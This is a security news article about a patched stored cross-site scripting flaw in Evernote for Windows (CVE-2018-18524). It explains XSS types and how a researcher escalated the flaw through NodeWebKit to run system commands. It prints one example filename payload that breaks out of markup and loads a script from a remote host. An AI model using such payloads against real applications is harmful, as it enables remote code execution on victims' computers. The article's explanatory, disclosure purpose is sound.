Online note sharing company Evernote has patched a hole that allowed attackers to infect notes shared via its service. The vulnerability (CVE-2018-18524) could have allowed an attacker to run programs remotely on a victim’s computer simply by sharing a note with them and persuading them to view it.
Evernote has patched the vulnerability in Evernote for Windows 6.16.1 beta.
The vulnerability, discovered by TongQing Zhu, a researcher at Chinese cybersecurity company Knownsec, was a form of cross-site scripting (XSS) attack. XSS attacks allow attackers to inject malicious code into websites, and they come in two forms:
The first is the way we normally think of XSS, called reflected XSS. Reflected XSS works by poisoning links to legitimate websites with malicious, executable code. When the victim clicks the link, the vulnerable website processes the link’s information as normal, to work out which page to give you, and inadvertently runs the malicious code at the same time.
For this to work, the attacker has to fool you into clicking on link they’ve given you, either by sending it to you in an email or adding it to another website or social media post.
The second type of XSS exploit, which is what Zhu found in Evernote, is called stored or persistent XSS. Instead of poisoning a malicious link and hoping you click it, the attacker embeds their malicious code into the website directly.
To pull this off they typically have to find a place on a website that embeds user-supplied data, such as a comment form, into which they inject their code. Anyone landing on the page after the attacker will automatically execute the code they’ve left behind.
Because many native desktop and mobile applications use browser engines to display information, XSS attacks can affect them too, and that’s what happened here.
In this case, another security researcher found an XSS flaw in an older version of Evernote that enabled attackers to launch JavaScript commands directly in the program’s stored notes.
As with all XSS attacks, the vulnerability was caused by poor data validation: input that should have been handled as data was treated as code. Because it didn’t remove or escape the characters <, > and " in the filenames of pictures embedded in notes, attackers could exploit Evernote notes by embedding code into filenames, like so:
"><script src="http://example.org/bad-javascript.js">.jpg
When the note was opened, the code would run. The example above would fetch more malicious code from a remote location.
That isn’t something Evernote would want a note to do, but Zhu took it further.
He searched around in Evernote’s installation folders and found NodeWebKit, which is an application runtime based on the Chromium open-source browser and the Node.js JavaScript framework. Evernote uses this runtime in its presentation mode.
After some trial and error with different commands, he was able to use Node.js to execute system commands and read system files. If he could get a Node.js script into a note in presentation mode, he figured he could get the NodeWebKit runtime to run it on the victim’s machine.
To deliver the script to the runtime, he exploited the validation flaw in Evernote’s notes by renaming a file and including a reference to his Node.js file.
Zhu could deliver the infected note simply enough via the Evernote work chat function, which allows different Evernote users to chat with each other electronically. He would include an instruction to view the note in presentation mode. If the user took the bait, NodeWebKit would automatically run his script.
He demonstrated this by displaying the contents of Win.ini and opening the Windows calculator when viewing an infected note in a test account.
Because of his efforts, Evernote users are a little safer today (provided they download and install the update), and Zhu has been added to the Evernote Hall of Fame.